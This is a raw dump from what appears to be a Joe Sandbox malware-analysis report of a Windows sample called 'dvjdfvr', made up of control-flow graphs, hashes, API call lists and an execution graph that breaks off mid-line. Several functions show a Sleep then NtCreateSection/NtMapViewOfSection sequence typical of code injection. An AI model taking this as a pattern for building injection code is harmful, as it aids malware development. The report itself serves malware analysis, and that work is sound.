                                                        control_flow_graph 282 401959-4019c5 call 401207 Sleep call 401482 296 4019d4-401a19 282->296 297 4019c7-4019cf call 401583 282->297 307 401a1c-401a25 call 401207 296->307 308 401a0f-401a15 296->308 297->296 308->307
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                                        • Instruction ID: 220a72f44c34cad911d214d6bf830d158092726683e2111099ccb198781fee4b
                                                        • Opcode Fuzzy Hash: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                                        • Instruction Fuzzy Hash: 1311BCB1648204FADA009A849C62E7A3228AB41754F204137BA47B90F1C57DA913EAAF
                                                        Function 00401970 Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 311 401970-4019c5 call 401207 Sleep call 401482 323 4019d4-401a19 311->323 324 4019c7-4019cf call 401583 311->324 334 401a1c-401a25 call 401207 323->334 335 401a0f-401a15 323->335 324->323 335->334
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                                        • Instruction ID: edf3ac2f4a0a3dadc82130375ffc9a201d65d5ca35b25829e414e95522c05f9b
                                                        • Opcode Fuzzy Hash: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                                        • Instruction Fuzzy Hash: AA01C0B174C104EBDB009A84DC62E7A3214AF41704F204537BA57B91F1C53EAA23FB5B
                                                        Function 00401977 Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 338 401977-4019c5 call 401207 Sleep call 401482 347 4019d4-401a19 338->347 348 4019c7-4019cf call 401583 338->348 358 401a1c-401a25 call 401207 347->358 359 401a0f-401a15 347->359 348->347 359->358
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                                        • Instruction ID: c889a794982209429869940d23560ef391d683eb1520a1ae8baa03dfc3eb9000
                                                        • Opcode Fuzzy Hash: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                                        • Instruction Fuzzy Hash: E601E1B1308100EBD7009B849C51ABA3614AF41314F20413BB957790E2C53EAA22EB5B
                                                        Function 00401987 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 362 401987-4019c5 call 401207 Sleep call 401482 373 4019d4-401a19 362->373 374 4019c7-4019cf call 401583 362->374 384 401a1c-401a25 call 401207 373->384 385 401a0f-401a15 373->385 374->373 385->384
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                                        • Instruction ID: 1aa0efa7bda459d32f82bf33ce90feabc7a2b43109eca8adeaaf204144b81d62
                                                        • Opcode Fuzzy Hash: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                                        • Instruction Fuzzy Hash: C201C0B1708104EBDB009A84DC62E7A3214AF41714F204137BA57791F1C53EAA23FB5B
                                                        Function 0040198A Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 388 40198a-40199d 389 4019a8-4019c5 Sleep call 401482 388->389 390 4019a2 call 401207 388->390 393 4019d4-401a19 389->393 394 4019c7-4019cf call 401583 389->394 390->389 404 401a1c-401a25 call 401207 393->404 405 401a0f-401a15 393->405 394->393 405->404
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                                        • Instruction ID: 93e9f4b763319a312fe66b3304ba82e0c9e14e36225fd67d869cb8e68c59c211
                                                        • Opcode Fuzzy Hash: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                                        • Instruction Fuzzy Hash: 5501B572308244EBDB019F90DC92EAE3728AF45318F24017BB557790E2C53DA912EB1B
                                                        Function 00531696 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 408 531696-5316d0 call 5319a9 411 5316d2-531705 VirtualAlloc call 531723 408->411 412 53171e 408->412 414 53170a-53171c 411->414 412->412 414->412
                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005316E7
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090450815.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_520000_dvjdfvr.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction ID: 60f54c2b6c70baf80981567106971bff7766605a00caad6439414e639d251a47
                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction Fuzzy Hash: 8E112D79A00208EFDB01DF98C985E98BFF5EF08350F058094F9489B362D771EA50DB84

                                                        Execution Graph

                                                        Execution Coverage:0.2%
                                                        Dynamic/Decrypted Code Coverage:16.3%
                                                        Signature Coverage:4.2%
                                                        Total number of Nodes:1745
                                                        Total number of Limit Nodes:0
                                                        execution_graph 7607 407bc1 TlsAlloc 7489 407303 7490 40733f 7489->7490 7491 407315 7489->7491 7491->7490 7493 40991b 7491->7493 7494 409927 __calloc_impl 7493->7494 7495 407d9b __getptd 67 API calls 7494->7495 7497 40992c 7495->7497 7499 40be4e 7497->7499 7500 40be6d 7499->7500 7503 40be74 7499->7503 7501 405944 __NMSG_WRITE 67 API calls 7500->7501 7501->7503 7511 4099ba 7503->7511 7505 40be85 _memset 7507 40bf5d 7505->7507 7510 40bf1d SetUnhandledExceptionFilter UnhandledExceptionFilter 7505->7510 7535 4058c2 7507->7535 7510->7507 7512 407b4f __decode_pointer 6 API calls 7511->7512 7513 4099c5 7512->7513 7513->7505 7514 4099c7 7513->7514 7517 4099d3 __calloc_impl 7514->7517 7515 409a2f 7516 409a10 7515->7516 7521 409a3e 7515->7521 7520 407b4f __decode_pointer 6 API calls 7516->7520 7517->7515 7517->7516 7518 4099fa 7517->7518 7522 4099f6 7517->7522 7519 407d22 __getptd_noexit 67 API calls 7518->7519 7526 4099ff _siglookup 7519->7526 7520->7526 7523 405b6a __calloc_impl 67 API calls 7521->7523 7522->7518 7522->7521 7524 409a43 7523->7524 7525 406ee2 __calloc_impl 6 API calls 7524->7525 7534 409a08 __calloc_impl 7525->7534 7527 409aa5 7526->7527 7528 4058c2 _abort 67 API calls 7526->7528 7526->7534 7529 4048fc __lock 67 API calls 7527->7529 7530 409ab0 7527->7530 7528->7527 7529->7530 7531 407b46 __init_pointers 6 API calls 7530->7531 7532 409ae5 7530->7532 7531->7532 7538 409b3b 7532->7538 7534->7505 7536 405780 _doexit 67 API calls 7535->7536 7537 4058d3 7536->7537 7539 409b41 7538->7539 7540 409b48 7538->7540 7542 404822 LeaveCriticalSection 7539->7542 7540->7534 7542->7540 7360 407345 SetUnhandledExceptionFilter 7608 4039c5 7611 407354 7608->7611 7612 407d22 __getptd_noexit 67 API calls 7611->7612 7613 4039d6 7612->7613 7614 4061c6 7617 4061d7 7614->7617 7615 4061dd 7616 405b6a __calloc_impl 67 API calls 7616->7617 7617->7615 7617->7616 7618 40616d 101 API calls _write_multi_char 7617->7618 7618->7617 7619 4095c8 7620 4095da 7619->7620 7622 4095e8 @_EH4_CallFilterFunc@8 7619->7622 7621 40841c __atodbl_l 5 API calls 7620->7621 7621->7622 7656 408689 7659 40855d 7656->7659 7660 405bea _LocaleUpdate::_LocaleUpdate 77 API calls 7659->7660 7661 408571 7660->7661 6091 4038ca 6092 4038db 6091->6092 6127 4055dc HeapCreate 6092->6127 6095 403913 6129 403872 6095->6129 6096 40391a 6137 407ee4 GetModuleHandleW 6096->6137 6100 40392b __RTC_Initialize 6170 407834 6100->6170 6101 403872 _fast_error_exit 67 API calls 6101->6100 6103 403939 6104 403945 GetCommandLineW 6103->6104 6185 40563c 6103->6185 6192 4077d7 GetEnvironmentStringsW 6104->6192 6107 403954 6198 407729 GetModuleFileNameW 6107->6198 6110 40395e 6111 40563c __amsg_exit 67 API calls 6110->6111 6113 403969 6110->6113 6111->6113 6202 4074fa 6113->6202 6115 40397a 6214 4056fb 6115->6214 6116 40563c __amsg_exit 67 API calls 6116->6115 6118 403981 6119 40563c __amsg_exit 67 API calls 6118->6119 6120 40398c __wwincmdln 6118->6120 6119->6120 6220 402df0 6120->6220 6123 4039bb 6229 4058d8 6123->6229 6126 4039c0 __calloc_impl 6128 40390e 6127->6128 6128->6095 6128->6096 6130 403880 6129->6130 6131 403885 6129->6131 6232 405aef 6130->6232 6241 405944 6131->6241 6138 407ef8 6137->6138 6139 407efe 6137->6139 6140 40560c __crt_waiting_on_module_handle 2 API calls 6138->6140 6141 408067 6139->6141 6142 407f09 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 6139->6142 6140->6139 6576 407bfe 6141->6576 6143 407f52 TlsAlloc 6142->6143 6146 403920 6143->6146 6147 407fa0 TlsSetValue 6143->6147 6146->6100 6146->6101 6147->6146 6148 407fb1 6147->6148 6565 4058f6 6148->6565 6151 407ad4 __encode_pointer 6 API calls 6152 407fc1 6151->6152 6153 407ad4 __encode_pointer 6 API calls 6152->6153 6154 407fd1 6153->6154 6155 407ad4 __encode_pointer 6 API calls 6154->6155 6156 407fe1 6155->6156 6157 407ad4 __encode_pointer 6 API calls 6156->6157 6158 407ff1 6157->6158 6572 404780 6158->6572 6161 407b4f __decode_pointer 6 API calls 6162 408012 6161->6162 6162->6141 6163 40912c __calloc_crt 67 API calls 6162->6163 6164 40802b 6163->6164 6164->6141 6165 407b4f __decode_pointer 6 API calls 6164->6165 6166 408045 6165->6166 6166->6141 6167 40804c 6166->6167 6168 407c3b __initptd 67 API calls 6167->6168 6169 408054 GetCurrentThreadId 6168->6169 6169->6146 6585 4053f4 6170->6585 6172 407840 GetStartupInfoA 6173 40912c __calloc_crt 67 API calls 6172->6173 6179 407861 6173->6179 6174 407a7f __calloc_impl 6174->6103 6175 4079fc GetStdHandle 6180 4079c6 6175->6180 6176 40912c __calloc_crt 67 API calls 6176->6179 6177 407a61 SetHandleCount 6177->6174 6178 407a0e GetFileType 6178->6180 6179->6174 6179->6176 6179->6180 6182 407949 6179->6182 6180->6174 6180->6175 6180->6177 6180->6178 6183 409087 ___lock_fhandle InitializeCriticalSectionAndSpinCount 6180->6183 6181 407972 GetFileType 6181->6182 6182->6174 6182->6180 6182->6181 6184 409087 ___lock_fhandle InitializeCriticalSectionAndSpinCount 6182->6184 6183->6180 6184->6182 6186 405aef __FF_MSGBANNER 67 API calls 6185->6186 6187 405646 6186->6187 6188 405944 __NMSG_WRITE 67 API calls 6187->6188 6189 40564e 6188->6189 6190 407b4f __decode_pointer 6 API calls 6189->6190 6191 403944 6190->6191 6191->6104 6193 4077e8 6192->6193 6194 4077ec 6192->6194 6193->6107 6195 4090e7 __malloc_crt 67 API calls 6194->6195 6196 40780d _realloc 6195->6196 6197 407814 FreeEnvironmentStringsW 6196->6197 6197->6107 6199 40775e _wparse_cmdline 6198->6199 6200 4090e7 __malloc_crt 67 API calls 6199->6200 6201 4077a1 _wparse_cmdline 6199->6201 6200->6201 6201->6110 6203 407512 _wcslen 6202->6203 6205 40396f 6202->6205 6204 40912c __calloc_crt 67 API calls 6203->6204 6206 407536 _wcslen 6204->6206 6205->6115 6205->6116 6206->6205 6207 40759b 6206->6207 6209 40912c __calloc_crt 67 API calls 6206->6209 6210 4075c1 6206->6210 6213 406dba __invoke_watson 10 API calls 6206->6213 6586 40b2f4 6206->6586 6208 407275 ___convertcp 67 API calls 6207->6208 6208->6205 6209->6206 6211 407275 ___convertcp 67 API calls 6210->6211 6211->6205 6213->6206 6216 405709 __IsNonwritableInCurrentImage 6214->6216 6595 408fc5 6216->6595 6217 405727 __initterm_e 6219 405746 __IsNonwritableInCurrentImage __initterm 6217->6219 6599 409904 6217->6599 6219->6118 6221 403127 6220->6221 6728 402ae0 6221->6728 6223 403147 6224 40315e GetCurrentDirectoryA 6223->6224 6225 40316e 6223->6225 6224->6223 6225->6123 6226 4058ac 6225->6226 7337 405780 6226->7337 6228 4058bd 6228->6123 6230 405780 _doexit 67 API calls 6229->6230 6231 4058e3 6230->6231 6231->6126 6278 409f23 6232->6278 6235 409f23 __set_error_mode 67 API calls 6239 405b03 6235->6239 6236 405944 __NMSG_WRITE 67 API calls 6237 405b1b 6236->6237 6240 405944 __NMSG_WRITE 67 API calls 6237->6240 6238 405b25 6238->6131 6239->6236 6239->6238 6240->6238 6242 405958 6241->6242 6243 409f23 __set_error_mode 64 API calls 6242->6243 6274 40388d 6242->6274 6244 40597a 6243->6244 6245 405ab8 GetStdHandle 6244->6245 6246 409f23 __set_error_mode 64 API calls 6244->6246 6247 405ac6 _strlen 6245->6247 6245->6274 6248 40598b 6246->6248 6250 405adf WriteFile 6247->6250 6247->6274 6248->6245 6249 40599d 6248->6249 6249->6274 6477 409ebb 6249->6477 6250->6274 6253 4059d3 GetModuleFileNameA 6255 4059f1 6253->6255 6259 405a14 _strlen 6253->6259 6257 409ebb _strcpy_s 64 API calls 6255->6257 6258 405a01 6257->6258 6258->6259 6260 406dba __invoke_watson 10 API calls 6258->6260 6271 405a57 6259->6271 6493 409d72 6259->6493 6260->6259 6264 405a7b 6267 409cfe _strcat_s 64 API calls 6264->6267 6266 406dba __invoke_watson 10 API calls 6266->6264 6268 405a8f 6267->6268 6270 405aa0 6268->6270 6272 406dba __invoke_watson 10 API calls 6268->6272 6269 406dba __invoke_watson 10 API calls 6269->6271 6511 409b95 6270->6511 6502 409cfe 6271->6502 6272->6270 6275 405690 6274->6275 6562 405665 GetModuleHandleW 6275->6562 6279 409f32 6278->6279 6281 405af6 6279->6281 6284 405b6a 6279->6284 6281->6235 6281->6239 6290 407d22 GetLastError 6284->6290 6286 405b6f 6287 406ee2 6286->6287 6288 407b4f __decode_pointer 6 API calls 6287->6288 6289 406ef2 __invoke_watson 6288->6289 6304 407bca TlsGetValue 6290->6304 6293 407d8f SetLastError 6293->6286 6298 407d86 6342 407275 6298->6342 6299 407d6e 6324 407c3b 6299->6324 6302 407d76 GetCurrentThreadId 6302->6293 6303 407d8c 6303->6293 6305 407bfa 6304->6305 6306 407bdf 6304->6306 6305->6293 6309 40912c 6305->6309 6307 407b4f __decode_pointer 6 API calls 6306->6307 6308 407bea TlsSetValue 6307->6308 6308->6305 6310 409135 6309->6310 6312 407d4d 6310->6312 6313 409153 Sleep 6310->6313 6355 40bb54 6310->6355 6312->6293 6314 407b4f TlsGetValue 6312->6314 6313->6310 6315 407b67 6314->6315 6316 407b88 GetModuleHandleW 6314->6316 6315->6316 6319 407b71 TlsGetValue 6315->6319 6317 407ba3 GetProcAddress 6316->6317 6318 407b98 6316->6318 6323 407b80 6317->6323 6437 40560c 6318->6437 6322 407b7c 6319->6322 6322->6316 6322->6323 6323->6298 6323->6299 6441 4053f4 6324->6441 6326 407c47 GetModuleHandleW 6327 407c57 6326->6327 6328 407c5d 6326->6328 6329 40560c __crt_waiting_on_module_handle 2 API calls 6327->6329 6330 407c75 GetProcAddress GetProcAddress 6328->6330 6331 407c99 6328->6331 6329->6328 6330->6331 6332 4048fc __lock 63 API calls 6331->6332 6333 407cb8 InterlockedIncrement 6332->6333 6442 407d10 6333->6442 6336 4048fc __lock 63 API calls 6337 407cd9 6336->6337 6445 40a79a InterlockedIncrement 6337->6445 6339 407cf7 6457 407d19 6339->6457 6341 407d04 __calloc_impl 6341->6302 6343 407281 __calloc_impl 6342->6343 6344 4072c0 6343->6344 6345 4048fc __lock 65 API calls 6343->6345 6350 4072fa __dosmaperr __calloc_impl 6343->6350 6346 4072d5 HeapFree 6344->6346 6344->6350 6352 407298 ___sbh_find_block 6345->6352 6347 4072e7 6346->6347 6346->6350 6348 405b6a __calloc_impl 65 API calls 6347->6348 6349 4072ec GetLastError 6348->6349 6349->6350 6350->6303 6351 4072b2 6469 4072cb 6351->6469 6352->6351 6462 40495f 6352->6462 6356 40bb60 __calloc_impl 6355->6356 6357 40bb78 6356->6357 6367 40bb97 _memset 6356->6367 6358 405b6a __calloc_impl 66 API calls 6357->6358 6359 40bb7d 6358->6359 6362 406ee2 __calloc_impl 6 API calls 6359->6362 6360 40bc09 HeapAlloc 6360->6367 6361 40bb8d __calloc_impl 6361->6310 6362->6361 6367->6360 6367->6361 6368 4048fc 6367->6368 6375 40510e 6367->6375 6381 40bc50 6367->6381 6384 405bc2 6367->6384 6369 404911 6368->6369 6370 404924 EnterCriticalSection 6368->6370 6387 404839 6369->6387 6370->6367 6372 404917 6372->6370 6373 40563c __amsg_exit 66 API calls 6372->6373 6374 404923 6373->6374 6374->6370 6378 40513c 6375->6378 6376 4051de 6376->6367 6378->6376 6380 4051d5 6378->6380 6425 404c75 6378->6425 6380->6376 6432 404d25 6380->6432 6436 404822 LeaveCriticalSection 6381->6436 6383 40bc57 6383->6367 6385 407b4f __decode_pointer 6 API calls 6384->6385 6386 405bd2 6385->6386 6386->6367 6388 404845 __calloc_impl 6387->6388 6389 405aef __FF_MSGBANNER 67 API calls 6388->6389 6402 40486b 6388->6402 6390 40485a 6389->6390 6393 405944 __NMSG_WRITE 67 API calls 6390->6393 6391 40487b __calloc_impl 6391->6372 6395 404861 6393->6395 6400 405690 _malloc 3 API calls 6395->6400 6396 40489c 6399 4048fc __lock 67 API calls 6396->6399 6397 40488d 6398 405b6a __calloc_impl 67 API calls 6397->6398 6398->6391 6401 4048a3 6399->6401 6400->6402 6403 4048d7 6401->6403 6404 4048ab 6401->6404 6402->6391 6413 4090e7 6402->6413 6406 407275 ___convertcp 67 API calls 6403->6406 6418 409087 6404->6418 6407 4048c8 6406->6407 6422 4048f3 6407->6422 6408 4048b6 6408->6407 6410 407275 ___convertcp 67 API calls 6408->6410 6411 4048c2 6410->6411 6412 405b6a __calloc_impl 67 API calls 6411->6412 6412->6407 6416 4090f0 6413->6416 6414 403395 _malloc 66 API calls 6414->6416 6415 404886 6415->6396 6415->6397 6416->6414 6416->6415 6417 409107 Sleep 6416->6417 6417->6416 6419 4053f4 __calloc_impl 6418->6419 6420 409093 InitializeCriticalSectionAndSpinCount 6419->6420 6421 4090d7 __calloc_impl 6420->6421 6421->6408 6423 404822 _doexit LeaveCriticalSection 6422->6423 6424 4048fa 6423->6424 6424->6391 6426 404c88 HeapReAlloc 6425->6426 6427 404cbc HeapAlloc 6425->6427 6428 404ca6 6426->6428 6429 404caa 6426->6429 6427->6428 6430 404cdf VirtualAlloc 6427->6430 6428->6380 6429->6427 6430->6428 6431 404cf9 HeapFree 6430->6431 6431->6428 6433 404d3c VirtualAlloc 6432->6433 6435 404d83 6433->6435 6435->6376 6436->6383 6438 405617 Sleep GetModuleHandleW 6437->6438 6439 405635 6438->6439 6440 405639 6438->6440 6439->6438 6439->6440 6440->6317 6440->6323 6441->6326 6460 404822 LeaveCriticalSection 6442->6460 6444 407cd2 6444->6336 6446 40a7b8 InterlockedIncrement 6445->6446 6447 40a7bb 6445->6447 6446->6447 6448 40a7c5 InterlockedIncrement 6447->6448 6449 40a7c8 6447->6449 6448->6449 6450 40a7d2 InterlockedIncrement 6449->6450 6451 40a7d5 6449->6451 6450->6451 6452 40a7df InterlockedIncrement 6451->6452 6453 40a7e2 6451->6453 6452->6453 6454 40a7fb InterlockedIncrement 6453->6454 6455 40a80b InterlockedIncrement 6453->6455 6456 40a816 InterlockedIncrement 6453->6456 6454->6453 6455->6453 6456->6339 6461 404822 LeaveCriticalSection 6457->6461 6459 407d20 6459->6341 6460->6444 6461->6459 6463 404c40 6462->6463 6464 40499e 6462->6464 6463->6351 6464->6463 6465 404b8a VirtualFree 6464->6465 6466 404bee 6465->6466 6466->6463 6467 404bfd VirtualFree HeapFree 6466->6467 6472 4091d0 6467->6472 6476 404822 LeaveCriticalSection 6469->6476 6471 4072d2 6471->6344 6473 4091e8 6472->6473 6474 409217 6473->6474 6475 40920f __VEC_memcpy 6473->6475 6474->6463 6475->6474 6476->6471 6478 409ed3 6477->6478 6479 409ecc 6477->6479 6480 405b6a __calloc_impl 67 API calls 6478->6480 6479->6478 6481 409ef9 6479->6481 6485 409ed8 6480->6485 6483 4059bf 6481->6483 6484 405b6a __calloc_impl 67 API calls 6481->6484 6482 406ee2 __calloc_impl 6 API calls 6482->6483 6483->6253 6486 406dba 6483->6486 6484->6485 6485->6482 6538 40b110 6486->6538 6488 406de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6489 406ec3 GetCurrentProcess TerminateProcess 6488->6489 6490 406eb7 __invoke_watson 6488->6490 6540 40841c 6489->6540 6490->6489 6492 4059d0 6492->6253 6498 409d84 6493->6498 6494 409d88 6495 405a44 6494->6495 6496 405b6a __calloc_impl 67 API calls 6494->6496 6495->6269 6495->6271 6497 409da4 6496->6497 6499 406ee2 __calloc_impl 6 API calls 6497->6499 6498->6494 6498->6495 6500 409dce 6498->6500 6499->6495 6500->6495 6501 405b6a __calloc_impl 67 API calls 6500->6501 6501->6497 6505 409d16 6502->6505 6506 409d0f 6502->6506 6503 405b6a __calloc_impl 67 API calls 6504 409d1b 6503->6504 6507 406ee2 __calloc_impl 6 API calls 6504->6507 6505->6503 6506->6505 6508 409d4a 6506->6508 6509 405a6a 6507->6509 6508->6509 6510 405b6a __calloc_impl 67 API calls 6508->6510 6509->6264 6509->6266 6510->6504 6549 407b46 6511->6549 6514 409bb8 LoadLibraryA 6515 409ce2 6514->6515 6516 409bcd GetProcAddress 6514->6516 6515->6274 6516->6515 6519 409be3 6516->6519 6517 409c6a 6520 407b4f __decode_pointer 6 API calls 6517->6520 6537 409c95 6517->6537 6518 409c40 6518->6517 6521 407b4f __decode_pointer 6 API calls 6518->6521 6552 407ad4 TlsGetValue 6519->6552 6531 409cad 6520->6531 6524 409c5d 6521->6524 6523 407b4f __decode_pointer 6 API calls 6523->6515 6526 407b4f __decode_pointer 6 API calls 6524->6526 6526->6517 6527 407ad4 __encode_pointer 6 API calls 6528 409bfe GetProcAddress 6527->6528 6529 407ad4 __encode_pointer 6 API calls 6528->6529 6530 409c13 GetProcAddress 6529->6530 6532 407ad4 __encode_pointer 6 API calls 6530->6532 6533 407b4f __decode_pointer 6 API calls 6531->6533 6531->6537 6534 409c28 6532->6534 6533->6537 6534->6518 6535 409c32 GetProcAddress 6534->6535 6536 407ad4 __encode_pointer 6 API calls 6535->6536 6536->6518 6537->6523 6539 40b11c __VEC_memzero 6538->6539 6539->6488 6541 408424 6540->6541 6542 408426 IsDebuggerPresent 6540->6542 6541->6492 6548 40b105 6542->6548 6545 40b44a SetUnhandledExceptionFilter UnhandledExceptionFilter 6546 40b467 __invoke_watson 6545->6546 6547 40b46f GetCurrentProcess TerminateProcess 6545->6547 6546->6547 6547->6492 6548->6545 6550 407ad4 __encode_pointer 6 API calls 6549->6550 6551 407b4d 6550->6551 6551->6514 6551->6518 6553 407aec 6552->6553 6554 407b0d GetModuleHandleW 6552->6554 6553->6554 6557 407af6 TlsGetValue 6553->6557 6555 407b28 GetProcAddress 6554->6555 6556 407b1d 6554->6556 6561 407b05 GetProcAddress 6555->6561 6558 40560c __crt_waiting_on_module_handle 2 API calls 6556->6558 6560 407b01 6557->6560 6559 407b23 6558->6559 6559->6555 6559->6561 6560->6554 6560->6561 6561->6527 6563 405679 GetProcAddress 6562->6563 6564 405689 ExitProcess 6562->6564 6563->6564 6566 407b46 __init_pointers 6 API calls 6565->6566 6567 4058fe __init_pointers __initp_misc_winsig 6566->6567 6582 409954 6567->6582 6570 407ad4 __encode_pointer 6 API calls 6571 40593a 6570->6571 6571->6151 6573 40478b 6572->6573 6574 409087 ___lock_fhandle InitializeCriticalSectionAndSpinCount 6573->6574 6575 4047b9 6573->6575 6574->6573 6575->6141 6575->6161 6577 407c08 6576->6577 6578 407c14 6576->6578 6581 407b4f __decode_pointer 6 API calls 6577->6581 6579 407c36 6578->6579 6580 407c28 TlsFree 6578->6580 6579->6579 6580->6579 6581->6578 6583 407ad4 __encode_pointer 6 API calls 6582->6583 6584 405930 6583->6584 6584->6570 6585->6172 6587 40b305 6586->6587 6588 40b30c 6586->6588 6587->6588 6592 40b338 6587->6592 6589 405b6a __calloc_impl 67 API calls 6588->6589 6590 40b311 6589->6590 6591 406ee2 __calloc_impl 6 API calls 6590->6591 6593 40b320 6591->6593 6592->6593 6594 405b6a __calloc_impl 67 API calls 6592->6594 6593->6206 6594->6590 6596 408fcb 6595->6596 6597 407ad4 